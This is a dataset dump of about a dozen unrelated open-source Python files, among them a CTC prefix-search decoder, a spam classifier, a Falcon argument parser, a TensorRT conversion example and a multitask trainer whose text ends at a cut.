max_stars_repo_path (string, 4-245 chars) | max_stars_repo_name (string, 7-115 chars) | max_stars_count (int64, 101-368k) | id (string, 2-8 chars) | content (string, 6-1.03M chars)
---|---|---|---|---|
src/winforms/toga_winforms/widgets/tree.py | luizoti/toga | 1,261 | 77964 |
from toga_winforms.libs import WinForms
from .base import Widget
class Tree(Widget):
def create(self):
self.native = WinForms.TreeView()
def row_data(self, item):
self.interface.factory.not_implemented('Tree.row_data()')
def on_select(self, selection):
self.interface.factory.not_implemented('Tree.on_select()')
def change_source(self, source):
self.interface.factory.not_implemented('Tree.change_source()')
def insert(self, parent, index, item):
self.interface.factory.not_implemented('Tree.insert()')
def change(self, item):
self.interface.factory.not_implemented('Tree.change()')
def remove(self, parent, index, item):
self.interface.factory.not_implemented('Tree.remove()')
def clear(self):
self.interface.factory.not_implemented('Tree.clear()')
def get_selection(self):
self.interface.factory.not_implemented('Tree.get_selection()')
def set_on_select(self, handler):
self.interface.factory.not_implemented('Tree.set_on_select()')
def set_on_double_click(self, handler):
self.interface.factory.not_implemented('Tree.set_on_double_click()')
def scroll_to_node(self, node):
self.interface.factory.not_implemented('Tree.scroll_to_node()')
|
qt4i/driver/host.py | beijixing0202/QT4i | 209 | 77967 |
# -*- coding:utf-8 -*-
#
# Tencent is pleased to support the open source community by making QTA available.
# Copyright (C) 2016 THL A29 Limited, a Tencent company. All rights reserved.
# Licensed under the BSD 3-Clause License (the "License"); you may not use this
# file except in compliance with the License. You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
#
'''RPC Server Host Driver
'''
from __future__ import absolute_import, print_function
import os
import base64
import six
from qt4i.driver.rpc import rpc_method
from qt4i.driver.rpc import RPCEndpoint
from qt4i.driver.tools.dt import DT
from qt4i.driver.xctest.agent import XCUITestAgentManager
BUFFER_SIZE = 1024*1024*100
class RPCServerHost(RPCEndpoint):
"""RPC Server Host API
"""
agent_manager = XCUITestAgentManager()
def __init__(self, rpc_server):
self.rpc_server = rpc_server
RPCEndpoint.__init__(self)
@rpc_method
def pull_file_data(self, filepath, seek_index, buffer_size=BUFFER_SIZE):
'''copy file from rpc server
:param filepath: file path of rpc server
:type filepath: str
:param seek_index: chunk index; the read starts at seek_index * buffer_size
:type seek_index: int
:returns: base64-encoded chunk of the file, or None if the seek offset is beyond the end of the file
'''
if os.path.exists(filepath):
with open(filepath, "rb") as fd:
seek = seek_index * buffer_size
if seek <= os.path.getsize(filepath):
fd.seek(seek)
data = base64.b64encode(fd.read(buffer_size))
return data
return None
else:
raise Exception('file(%s) does not exist' % filepath)
@rpc_method
def push_file_data(self, data, file_path, override=True):
'''push file to rpc server
:param data: str
:param file_path: str
:param override: boolean
:return: boolean
'''
if os.path.exists(file_path) and override:
os.remove(file_path)
with open(file_path, "ab") as fd:
if six.PY3 and isinstance(data, six.string_types):
data = data.encode('utf-8')
fd.write(base64.decodebytes(data))
else:
fd.write(base64.decodestring(data))
return os.path.isfile(file_path)
@rpc_method
def list_devices(self):
'''list all devices of rpc server host
:return: list
'''
return DT().get_devices()
@rpc_method
def list_real_devices(self):
'''list all real iOS devices of rpc server host
:returns: list
'''
return DT().get_real_devices()
@rpc_method
def list_simulators(self):
'''list all iOS simulators of rpc server host
:returns: list
'''
return DT().get_simulators()
@rpc_method
def start_simulator(self, udid=None):
'''start iOS simulator of rpc server host
:param udid: udid of iOS simulator
:type udid: str
:returns: boolean
'''
return DT().start_simulator(udid)
@rpc_method
def get_device_by_udid(self, udid):
'''inquire device by udid
:param udid: udid of device
:type udid: str
:returns: dict or None
'''
return DT().get_device_by_udid(udid)
@rpc_method
def echo(self):
'''test xmlrpc server started
:returns: boolean
'''
return True
@rpc_method
def stop_all_agents(self):
'''
stop all agents
'''
XCUITestAgentManager.stop_all_agents()
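# --- Illustrative sketch (not part of the original module) ---
# Shows the chunked-transfer contract of pull_file_data(): chunks are requested with
# seek_index = 0, 1, 2, ... until a falsy value is returned, and each chunk is
# base64-decoded before being written out. The endpoint is called in-process here for
# brevity; in a real deployment the same calls go through the XML-RPC server, so the
# exact method path depends on how RPCServerHost is registered.
def example_pull_file(host, remote_path, local_path, buffer_size=BUFFER_SIZE):
    with open(local_path, 'wb') as out:
        seek_index = 0
        while True:
            chunk = host.pull_file_data(remote_path, seek_index, buffer_size)
            if not chunk:
                break
            out.write(base64.b64decode(chunk))
            seek_index += 1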
|
scripts/templates/a_verify.py | eBay/accelerator | 143 | 77972 |
from math import isnan
from datetime import datetime
import sys
import accelerator
from accelerator.test_methods import test_data
options = dict(n=int, now=datetime)
jobs = ('source',)
nanmarker = object()
def nanfix(values):
def fix(v):
if isinstance(v, float) and isnan(v):
return nanmarker
else:
return v
return list(map(fix, values))
def prepare():
data = jobs.source.load()
assert data['now'] == options.now
if data['py_version'] == 2:
assert data['blaa'] == u'bl\xe5'.encode('utf-8')
else:
assert data['blaa'] == u'bl\xe5'
def analysis(sliceno):
good = test_data.sort_data_for_slice(sliceno)
for lineno, got in enumerate(jobs.source.dataset().iterate(sliceno)):
want = next(good)
assert nanfix(want) == nanfix(got), "Wanted:\n%r\nbut got:\n%r\non line %d in slice %d of %s" % (want, got, lineno, sliceno, jobs.source)
left_over = len(list(good))
assert left_over == 0, "Slice %d of %s missing %d lines" % (sliceno, jobs.source, left_over,)
if jobs.source.load()['py_version'] > 2 and sys.version_info[0] > 2:
assert list(jobs.source.dataset('pickle').iterate(sliceno, 'p')) == [{'sliceno': sliceno}]
def synthesis(job):
p = jobs.source.params
assert p.versions.accelerator == accelerator.__version__
with job.open_input('proj/accelerator.conf') as fh:
for line in fh:
if line.startswith('interpreters: p%d ' % (options.n,)):
path = line.split(' ', 2)[2].strip()[1:-1]
break
else:
raise Exception('Failed to find interpreter #%d in accelerator.conf' % (options.n,))
assert p.versions.python_path == path
|
biostar/utils/spamlib.py | tangibleai/biostar-central | 477 | 77981 |
'''
Spam predictor
pip install -U scikit-learn
X are the data features
y are the labels [ 0, 0, 1 ...]
Download the enron database for testing
http://www2.aueb.gr/users/ion/data/enron-spam/
Should work on any of the datasets:
seq 1 6 | parallel -j 1 wget -q -nc http://www.aueb.gr/users/ion/data/enron-spam/preprocessed/enron{}.tar.gz
'''
import logging
import sys, os
import plac
from joblib import dump, load
logger = logging.getLogger("engine")
try:
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.metrics import classification_report
from sklearn.model_selection import train_test_split
from sklearn.naive_bayes import MultinomialNB
from sklearn.pipeline import make_pipeline
has_sklearn = True
except ImportError as exc:
logger.error("sklearn not installed, no predictions are generated")
has_sklearn = False
def load_model(model="spam.model"):
nb = load(model)
return nb
def classify_content(content, model):
"""
Classify content
"""
if not has_sklearn:
return 0
try:
nb = load_model(model)
y_pred = nb.predict([content])
except Exception as exc:
logger.error(exc)
y_pred = [0]
return y_pred[0]
def fit_model(X, y):
nb = make_pipeline(
CountVectorizer(),
MultinomialNB(),
# LinearSVC(),
# RandomForestClassifier(),
)
nb.fit(X, y)
return nb
def evaluate_model(fname, model):
X, y = parse_file(fname=fname)
X_train, X_test, y_train, y_test = train_test_split(X, y)
if model:
nb = load_model(model)
else:
nb = fit_model(X_train, y_train)
y_pred = nb.predict(X_test)
rep = classification_report(y_test, y_pred)
print(rep)
def parse_file(fname):
import tarfile
# Take filename from command line
tar = tarfile.open(name=fname, mode='r:gz', fileobj=None)
elems = filter(lambda t: t.isreg(), tar)
X, y = [], []
for info in elems:
# Fill in the labels
y.append(int("spam" in info.name))
stream = tar.extractfile(info)
content = stream.read().decode("utf-8", errors="ignore")
X.append(content)
spam_count = sum(filter(None, y))
ham_count = len(y) - spam_count
logger.info(f"parsed: {ham_count} ham, {spam_count} spam")
return X, y
def build_model(fname, model):
'''
wget -nc http://www.aueb.gr/users/ion/data/enron-spam/preprocessed/enron1.tar.gz
'''
# Generate features.
X, y = parse_file(fname)
# Fits the model.
nb = fit_model(X, y)
logger.info(f"fitted model to: {fname}")
# Save the model.
if model:
logger.info(f"saving model to: {model}")
dump(nb, model)
return nb
# evaluate_model(X, y, model=model)
@plac.pos('fname')
@plac.flg('build')
@plac.flg('eval_', help="evaluate model ")
@plac.opt('model')
@plac.flg('classify')
def main(classify, build, model, eval_, fname):
if build:
build_model(fname=fname, model=model)
if eval_:
evaluate_model(fname=fname, model=model)
if classify:
content = open(fname, 'rt').read()
res = classify_content(content=content, model=model)
print ("spam" if res else "ham")
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
plac.call(main)
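# --- Illustrative usage sketch (not part of the original module) ---
# Programmatic equivalent of the CLI flow above; the file names below are placeholder
# assumptions (download an Enron archive as described in the module docstring first).
def example_usage(fname="enron1.tar.gz", model="spam.model"):
    build_model(fname=fname, model=model)            # train and persist the pipeline
    evaluate_model(fname=fname, model=model)         # print a classification report
    label = classify_content("Win a free prize now!!!", model=model)
    print("spam" if label else "ham")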
|
libs/webargs/falconparser.py | Sparklingx/nzbhydra | 674 | 77986 |
# -*- coding: utf-8 -*-
"""Falcon request argument parsing module.
"""
import falcon
from webargs import core
HTTP_422 = '422 Unprocessable entity'
def parse_json_body(req):
if req.content_length in (None, 0):
# Nothing to do
return {}
content_type = req.get_header('Content-Type')
if content_type and 'application/json' in content_type:
body = req.stream.read()
if body:
try:
return core.parse_json(body)
except (TypeError, ValueError):
pass
return {}
class HTTPError(falcon.HTTPError):
"""HTTPError that stores a dictionary of validation error messages.
"""
def __init__(self, status, errors, *args, **kwargs):
self.errors = errors
super(HTTPError, self).__init__(status, *args, **kwargs)
def to_dict(self, *args, **kwargs):
"""Override `falcon.HTTPError` to include error messages in responses."""
ret = super(HTTPError, self).to_dict(*args, **kwargs)
if self.errors is not None:
ret['errors'] = self.errors
return ret
class FalconParser(core.Parser):
"""Falcon request argument parser."""
def parse_querystring(self, req, name, field):
"""Pull a querystring value from the request."""
return core.get_value(req.params, name, field)
def parse_form(self, req, name, field):
"""Pull a form value from the request."""
return core.get_value(req.params, name, field)
def parse_json(self, req, name, field):
"""Pull a JSON body value from the request."""
json_body = self._cache.get('json')
if json_body is None:
self._cache['json'] = json_body = parse_json_body(req)
return core.get_value(json_body, name, field)
def parse_headers(self, req, name, field):
"""Pull a header value from the request."""
# Use req.get_header rather than req.headers for performance
return req.get_header(name, required=False) or core.missing
def parse_cookies(self, req, name, field):
"""Pull a cookie value from the request."""
cookies = self._cache.get('cookies')
if cookies is None:
self._cache['cookies'] = cookies = req.cookies
return core.get_value(cookies, name, field)
def get_request_from_view_args(self, view, args, kwargs):
"""Get request from a resource method's arguments. Assumes that
request is the second argument.
"""
req = args[1]
assert isinstance(req, falcon.Request), 'Argument is not a falcon.Request'
return req
def parse_files(self, req, name, field):
raise NotImplementedError('Parsing files not yet supported by {0}'
.format(self.__class__.__name__))
def handle_error(self, error):
"""Handles errors during parsing."""
raise HTTPError(HTTP_422, errors=error.messages)
parser = FalconParser()
use_args = parser.use_args
use_kwargs = parser.use_kwargs
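# --- Illustrative usage sketch (not part of the original module) ---
# Wires the parser defined above into a minimal Falcon app. Assumes a marshmallow
# version where `missing=` sets the default for absent arguments, and a Falcon
# version that still exposes falcon.API and resp.body.
def example_app():
    from marshmallow import fields

    class HelloResource(object):
        # The request is the second positional argument of the responder, which is
        # what FalconParser.get_request_from_view_args() relies on.
        @use_args({'name': fields.Str(missing='World')})
        def on_get(self, req, resp, args):
            resp.body = '{"hello": "%s"}' % args['name']

    api = falcon.API()
    api.add_route('/hello', HelloResource())
    return api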
|
airbyte-integrations/bases/airbyte-protocol/airbyte_protocol/models/__init__.py | rajatariya21/airbyte | 6,215 | 78020 |
# generated by generate-protocol-files
from .airbyte_protocol import *
|
examples/all_refs.py | wyfo/apimodel | 118 | 78063 |
from dataclasses import dataclass
from apischema.json_schema import deserialization_schema
@dataclass
class Bar:
baz: str
@dataclass
class Foo:
bar1: Bar
bar2: Bar
assert deserialization_schema(Foo, all_refs=False) == {
"$schema": "http://json-schema.org/draft/2020-12/schema#",
"$defs": {
"Bar": {
"additionalProperties": False,
"properties": {"baz": {"type": "string"}},
"required": ["baz"],
"type": "object",
}
},
"additionalProperties": False,
"properties": {"bar1": {"$ref": "#/$defs/Bar"}, "bar2": {"$ref": "#/$defs/Bar"}},
"required": ["bar1", "bar2"],
"type": "object",
}
assert deserialization_schema(Foo, all_refs=True) == {
"$schema": "http://json-schema.org/draft/2020-12/schema#",
"$defs": {
"Bar": {
"additionalProperties": False,
"properties": {"baz": {"type": "string"}},
"required": ["baz"],
"type": "object",
},
"Foo": {
"additionalProperties": False,
"properties": {
"bar1": {"$ref": "#/$defs/Bar"},
"bar2": {"$ref": "#/$defs/Bar"},
},
"required": ["bar1", "bar2"],
"type": "object",
},
},
"$ref": "#/$defs/Foo",
}
|
ctc_decoder/prefix_search.py | TenaciousC22/CTCDecoder | 705 | 78070 |
import numpy as np
def prefix_search(mat: np.ndarray, chars: str) -> str:
"""Prefix search decoding.
See dissertation of Graves, p63-66.
Args:
mat: Output of neural network of shape TxC.
chars: The set of characters the neural network can recognize, excluding the CTC-blank.
Returns:
The decoded text.
"""
blank_idx = len(chars)
max_T, max_C = mat.shape
# g_n and g_b: gamma in paper
g_n = []
g_b = []
# p(y|x) and p(y...|x), where y is a prefix (not p as in paper to avoid confusion with probability)
prob = {}
prob_ext = {}
# Init: 1-6
for t in range(max_T):
g_n.append({'': 0})
last = g_b[t - 1][''] if t > 0 else 1
g_b.append({'': last * mat[t, blank_idx]})
# init for empty prefix
prob[''] = g_b[max_T - 1]['']
prob_ext[''] = 1 - prob['']
l_star = y_star = ''
Y = {''}
# Algorithm: 8-31
while prob_ext[y_star] > prob[l_star]:
prob_remaining = prob_ext[y_star]
# for all chars
for k in range(max_C - 1):
y = y_star + chars[k]
g_n[0][y] = mat[0, k] if len(y_star) == 0 else 0
g_b[0][y] = 0
prefix_prob = g_n[0][y]
# for all time steps
for t in range(1, max_T):
new_label_prob = g_b[t - 1][y_star] + (
0 if y_star != '' and y_star[-1] == chars[k] else g_n[t - 1][y_star])
g_n[t][y] = mat[t, k] * (new_label_prob + g_n[t - 1][y])
g_b[t][y] = mat[t, blank_idx] * (g_b[t - 1][y] + g_n[t - 1][y])
prefix_prob += mat[t, k] * new_label_prob
prob[y] = g_n[max_T - 1][y] + g_b[max_T - 1][y]
prob_ext[y] = prefix_prob - prob[y]
prob_remaining -= prob_ext[y]
if prob[y] > prob[l_star]:
l_star = y
if prob_ext[y] > prob[l_star]:
Y.add(y)
if prob_remaining <= prob[l_star]:
break
# 30
Y.remove(y_star)
# 31
best_y = None
best_prob_ext = 0
for y in Y:
if prob_ext[y] > best_prob_ext:
best_prob_ext = prob_ext[y]
best_y = y
y_star = best_y
# terminate if no more prefix exists
if best_y is None:
break
# Termination: 33-34
return l_star
def prefix_search_heuristic_split(mat: np.ndarray, chars: str) -> str:
"""Prefix search decoding with heuristic to speed up the algorithm.
Speed up prefix computation by splitting sequence into subsequences as described by Graves (p66).
Args:
mat: Output of neural network of shape TxC.
chars: The set of characters the neural network can recognize, excluding the CTC-blank.
Returns:
The decoded text.
"""
blank_idx = len(chars)
max_T, _ = mat.shape
# split sequence into 3 subsequences, splitting points should be roughly placed at 1/3 and 2/3
split_targets = [int(max_T * 1 / 3), int(max_T * 2 / 3)]
best = [{'target': s, 'bestDist': max_T, 'bestIdx': s} for s in split_targets]
# find good splitting points (blanks above threshold)
thres = 0.9
for t in range(max_T):
for b in best:
if mat[t, blank_idx] > thres and abs(t - b['target']) < b['bestDist']:
b['bestDist'] = abs(t - b['target'])
b['bestIdx'] = t
break
# splitting points plus begin and end of sequence
ranges = [0] + [b['bestIdx'] for b in best] + [max_T]
# do prefix search for each subsequence and concatenate results
res = ''
for i in range(len(ranges) - 1):
beg = ranges[i]
end = ranges[i + 1]
res += prefix_search(mat[beg: end, :], chars)
return res
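# --- Illustrative usage sketch (not part of the original module) ---
# A tiny hand-made output matrix over the alphabet 'ab' plus the CTC blank (last
# column). Rows are time steps and each row sums to 1, mimicking a softmax output
# of shape TxC with C = len(chars) + 1.
def _example():
    mat = np.array([
        [0.8, 0.1, 0.1],   # mostly 'a'
        [0.1, 0.1, 0.8],   # mostly blank
        [0.1, 0.8, 0.1],   # mostly 'b'
    ])
    return prefix_search(mat, 'ab')  # expected to decode to 'ab'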
|
prompt_tuning/spot/data/nli.py | dumpmemory/prompt-tuning | 108 | 78087 |
# Copyright 2022 Google.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Summarization datasets."""
import functools
from prompt_tuning.spot.data import preprocessors as spot_preprocessors
import seqio
from t5.data import tasks as t5_tasks
from t5.evaluation import metrics as t5_metrics
TaskRegistry = seqio.TaskRegistry
MixtureRegistry = seqio.MixtureRegistry
DATASETS = {
'anli_r1': {
'tfds_name': 'anli/r1:0.1.0',
'text_a_key': 'hypothesis',
'text_b_key': 'context',
'label_names': ['entailment', 'neutral', 'contradiction'],
},
'anli_r2': {
'tfds_name': 'anli/r2:0.1.0',
'text_a_key': 'hypothesis',
'text_b_key': 'context',
'label_names': ['entailment', 'neutral', 'contradiction'],
},
'anli_r3': {
'tfds_name': 'anli/r3:0.1.0',
'text_a_key': 'hypothesis',
'text_b_key': 'context',
'label_names': ['entailment', 'neutral', 'contradiction'],
},
'doc_nli': {
'tfds_name': 'doc_nli:1.0.0',
'text_a_key': 'hypothesis',
'text_b_key': 'premise',
'label_names': ['not_entailment', 'entailment'],
},
'snli': {
'tfds_name': 'snli:1.1.0',
'text_a_key': 'hypothesis',
'text_b_key': 'premise',
'label_names': ['entailment', 'neutral', 'contradiction'],
},
}
# Register datasets
for dataset in DATASETS:
version = f"v{DATASETS[dataset]['tfds_name'].split(':')[-1].replace('.', '')}"
TaskRegistry.add(
f'spot_{dataset.lower()}_{version}',
source=seqio.TfdsDataSource(tfds_name=DATASETS[dataset]['tfds_name']),
preprocessors=[
functools.partial(
spot_preprocessors.preprocess_text_classification,
text_a_key=DATASETS[dataset]['text_a_key'],
text_b_key=DATASETS[dataset]['text_b_key'],
task_name=dataset,
label_names=DATASETS[dataset]['label_names']),
seqio.preprocessors.tokenize,
seqio.CacheDatasetPlaceholder(),
seqio.preprocessors.append_eos_after_trim,
],
metric_fns=[t5_metrics.accuracy],
output_features=t5_tasks.DEFAULT_OUTPUT_FEATURES)
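# --- Illustrative usage sketch (not part of the original module) ---
# Importing this module registers one seqio task per entry above, named
# f'spot_{name}_{version}', e.g. 'spot_snli_v110' for snli:1.1.0. The sequence
# lengths below are placeholder assumptions and the TFDS data must be available.
def example_load_snli_train():
    task = seqio.get_mixture_or_task('spot_snli_v110')
    return task.get_dataset(
        sequence_length={'inputs': 512, 'targets': 8},
        split='train')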
|
appengine/reddit.py | bharati-software/blockly-games-Kannada | 1,184 | 78088 |
"""Blockly Games: Legacy Reddit to Turtle/Movie router.
Copyright 2014 Google LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
"""Blockly Games used to use Reddit as a gallery. These URLs still exist.
"""
__author__ = "<EMAIL> (<NAME>)"
import os
import re
app = re.search(r"(\w+)-reddit$", os.environ.get('PATH_INFO', '')).group(1)
uuid = os.environ.get('QUERY_STRING', '')
print("Status: 301 Moved Permanently")
print("Location: /%s?level=10#%s\n" % (app, uuid))
|
temboardui/plugins/pgconf/__init__.py | missmoiselle/temboard | 294 | 78124 |
import logging
from os import path
import tornado.web
from tornado.escape import url_escape, url_unescape
from temboardui.web import (
Blueprint,
HTTPError,
Redirect,
TemplateRenderer,
)
PLUGIN_NAME = 'pgconf'
logger = logging.getLogger(__name__)
blueprint = Blueprint()
blueprint.generic_proxy("/pgconf/configuration", methods=["POST"])
plugin_path = path.dirname(path.realpath(__file__))
render_template = TemplateRenderer(plugin_path + "/templates")
def configuration(config):
return {}
def get_routes(config):
routes = blueprint.rules + [
(
r"/js/pgconf/(.*)",
tornado.web.StaticFileHandler,
{'path': plugin_path + "/static/js"}
),
(
r"/css/pgconf/(.*)",
tornado.web.StaticFileHandler,
{'path': plugin_path + "/static/css"}
),
]
return routes
@blueprint.instance_route("/pgconf/configuration(?:/category/(.+))?",
methods=["GET", "POST"])
def configuration_handler(request, category=None):
request.instance.check_active_plugin(PLUGIN_NAME)
profile = request.instance.get_profile()
agent_username = profile['username']
template_vars = {}
# Deduplicate HTTP prefix of plugin on agent.
prefix = "/pgconf/configuration"
query_filter = request.handler.get_argument('filter', None, strip=True)
status = request.instance.get(prefix + "/status")
categories = request.instance.get(prefix + "/categories")
if category:
category = url_unescape(category)
else:
category = categories['categories'][0]
logger.debug("category=%s", category)
if query_filter:
query = {'filter': query_filter}
configuration_url = prefix
else:
query = {}
configuration_url = prefix + "/category/" + url_escape(category)
configuration = request.instance.get(configuration_url, query=query)
if "POST" == request.method:
settings = {'settings': [
{'name': name, 'setting': value[0]}
for name, value in request.arguments.iteritems()
# 'filter' is not a setting, just ignore it.
if name != 'filter'
]}
try:
request.instance.post(prefix, body=settings)
# Redirect to GET page, same URI.
return Redirect(request.uri)
except HTTPError as e:
# Rerender HTML page with errors.
template_vars['error_code'] = e
template_vars['error_message'] = e.log_message
return render_template(
'configuration.html',
nav=True,
role=request.current_user,
instance=request.instance,
agent_username=agent_username,
plugin=PLUGIN_NAME,
xsession=request.instance.xsession,
current_cat=category,
configuration_categories=categories,
configuration_status=status,
data=configuration,
query_filter=query_filter,
**template_vars
)
|
src/tensorrt/tensorrt-3.0.4/tf_to_trt.py | aimuch/AIEnvConfig | 250 | 78153 |
#
# Copyright 1993-2017 NVIDIA Corporation. All rights reserved.
#
# NOTICE TO LICENSEE:
#
# This source code and/or documentation ("Licensed Deliverables") are
# subject to NVIDIA intellectual property rights under U.S. and
# international Copyright laws.
#
# These Licensed Deliverables contained herein is PROPRIETARY and
# CONFIDENTIAL to NVIDIA and is being provided under the terms and
# conditions of a form of NVIDIA software license agreement by and
# between NVIDIA and Licensee ("License Agreement") or electronically
# accepted by Licensee. Notwithstanding any terms or conditions to
# the contrary in the License Agreement, reproduction or disclosure
# of the Licensed Deliverables to any third party without the express
# written consent of NVIDIA is prohibited.
#
# NOTWITHSTANDING ANY TERMS OR CONDITIONS TO THE CONTRARY IN THE
# LICENSE AGREEMENT, NVIDIA MAKES NO REPRESENTATION ABOUT THE
# SUITABILITY OF THESE LICENSED DELIVERABLES FOR ANY PURPOSE. IT IS
# PROVIDED "AS IS" WITHOUT EXPRESS OR IMPLIED WARRANTY OF ANY KIND.
# NVIDIA DISCLAIMS ALL WARRANTIES WITH REGARD TO THESE LICENSED
# DELIVERABLES, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY,
# NONINFRINGEMENT, AND FITNESS FOR A PARTICULAR PURPOSE.
# NOTWITHSTANDING ANY TERMS OR CONDITIONS TO THE CONTRARY IN THE
# LICENSE AGREEMENT, IN NO EVENT SHALL NVIDIA BE LIABLE FOR ANY
# SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, OR ANY
# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
# OF THESE LICENSED DELIVERABLES.
#
# U.S. Government End Users. These Licensed Deliverables are a
# "commercial item" as that term is defined at 48 C.F.R. 2.101 (OCT
# 1995), consisting of "commercial computer software" and "commercial
# computer software documentation" as such terms are used in 48
# C.F.R. 12.212 (SEPT 1995) and is provided to the U.S. Government
# only as a commercial end item. Consistent with 48 C.F.R.12.212 and
# 48 C.F.R. 227.7202-1 through 227.7202-4 (JUNE 1995), all
# U.S. Government End Users acquire the Licensed Deliverables with
# only those rights set forth herein.
#
# Any use of the Licensed Deliverables in individual and commercial
# software must include, in the user documentation and internal
# comments to the code, the above Disclaimer and U.S. Government End
# Users Notice.
#
#!/usr/bin/python
from __future__ import division
from __future__ import print_function
import os
import sys
from random import randint
import numpy as np
import lenet5
try:
from PIL import Image
import pycuda.driver as cuda
import pycuda.autoinit
import argparse
except ImportError as err:
sys.stderr.write("""ERROR: failed to import module ({})
Please make sure you have pycuda and the example dependencies installed.
https://wiki.tiker.net/PyCuda/Installation/Linux
pip(3) install tensorrt[examples]
""".format(err))
exit(1)
try:
import uff
except ImportError:
raise ImportError("""Please install the UFF Toolkit""")
try:
import tensorrt as trt
from tensorrt.parsers import uffparser
except ImportError as err:
sys.stderr.write("""ERROR: failed to import module ({})
Please make sure you have the TensorRT Library installed
and accessible in your LD_LIBRARY_PATH
""".format(err))
exit(1)
MAX_WORKSPACE = 1 << 30
G_LOGGER = trt.infer.ConsoleLogger(trt.infer.LogSeverity.INFO)
INPUT_W = 28
INPUT_H = 28
OUTPUT_SIZE = 10
MAX_BATCHSIZE = 1
ITERATIONS = 10
# API CHANGE: Try to generalize into a utils function
#Run inference on device
def infer(context, input_img, batch_size):
#load engine
engine = context.get_engine()
assert(engine.get_nb_bindings() == 2)
#create output array to receive data
dims = engine.get_binding_dimensions(1).to_DimsCHW()
elt_count = dims.C() * dims.H() * dims.W() * batch_size
#convert input data to Float32
input_img = input_img.astype(np.float32)
#Allocate pagelocked memory
output = cuda.pagelocked_empty(elt_count, dtype=np.float32)
# Allocate device memory
d_input = cuda.mem_alloc(batch_size * input_img.size * input_img.dtype.itemsize)
d_output = cuda.mem_alloc(batch_size * output.size * output.dtype.itemsize)
bindings = [int(d_input), int(d_output)]
stream = cuda.Stream()
#transfer input data to device
cuda.memcpy_htod_async(d_input, input_img, stream)
#execute model
context.enqueue(batch_size, bindings, stream.handle, None)
#transfer predictions back
cuda.memcpy_dtoh_async(output, d_output, stream)
#return predictions
return output
def main():
path = os.path.dirname(os.path.realpath(__file__))
tf_model = lenet5.learn()
uff_model = uff.from_tensorflow(tf_model, ["fc2/Relu"])
#Convert Tensorflow model to TensorRT model
parser = uffparser.create_uff_parser()
parser.register_input("Placeholder", (1, 28, 28), 0)
parser.register_output("fc2/Relu")
engine = trt.utils.uff_to_trt_engine(G_LOGGER,
uff_model,
parser,
MAX_BATCHSIZE,
MAX_WORKSPACE)
assert(engine)
# parser.destroy()
context = engine.create_execution_context()
print("\n| TEST CASE | PREDICTION |")
for i in range(ITERATIONS):
img, label = lenet5.get_testcase()
img = img[0]
label = label[0]
out = infer(context, img, 1)
print("|-----------|------------|")
print("| " + str(label) + " | " + str(np.argmax(out)) + " |")
if __name__ == "__main__":
main()
|
official/modeling/multitask/base_trainer.py | 62theories/tf-flask | 82,518 | 78161 |
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Multitask base trainer implementation.
The trainer derives from the Orbit `StandardTrainer` class.
"""
from typing import Union
import gin
import orbit
import tensorflow as tf
from official.modeling.multitask import base_model
from official.modeling.multitask import multitask
@gin.configurable
class MultiTaskBaseTrainer(orbit.StandardTrainer):
"""Multitask base trainer."""
def __init__(self,
multi_task: multitask.MultiTask,
multi_task_model: Union[tf.keras.Model,
base_model.MultiTaskBaseModel],
optimizer: tf.optimizers.Optimizer,
trainer_options=None,
train_datasets=None):
self._strategy = tf.distribute.get_strategy()
self._multi_task = multi_task
self._multi_task_model = multi_task_model
self._optimizer = optimizer
self._training_losses = None
self._training_metrics = None
self._global_step = orbit.utils.create_global_step()
if hasattr(self.multi_task_model, "checkpoint_items"):
checkpoint_items = self.multi_task_model.checkpoint_items
else:
checkpoint_items = {}
self._checkpoint = tf.train.Checkpoint(
model=self.multi_task_model,
optimizer=self.optimizer,
global_step=self.global_step,
**checkpoint_items)
if train_datasets is None:
train_datasets = {}
for name, task in self.multi_task.tasks.items():
train_datasets[name] = orbit.utils.make_distributed_dataset(
self.strategy, task.build_inputs, task.task_config.train_data)
super().__init__(
train_dataset=train_datasets,
options=trainer_options or orbit.StandardTrainerOptions())
def train_loop_begin(self):
"""Clean up states that hold losses and metrics."""
for _, train_loss_metric in self.training_losses.items():
train_loss_metric.reset_states()
for _, metrics in self.training_metrics.items():
for metric in metrics:
metric.reset_states()
def train_loop_end(self):
"""Record loss and metric values per task."""
result = {}
for task_name, loss in self.training_losses.items():
result[task_name] = {loss.name: loss.result()}
for task_name, task_metrics in self.training_metrics.items():
result[task_name].update(
{metric.name: metric.result() for metric in task_metrics})
# Note that, the learning rate schedule is managed by the keras optimizer
# internally, which respects the number of backward pass as `iterations`.
# The learning rate schedule does not follow the trainer logical global
# step of multiple tasks.
if callable(self.optimizer.learning_rate):
result["learning_rate"] = self.optimizer.learning_rate(
self.optimizer.iterations)
else:
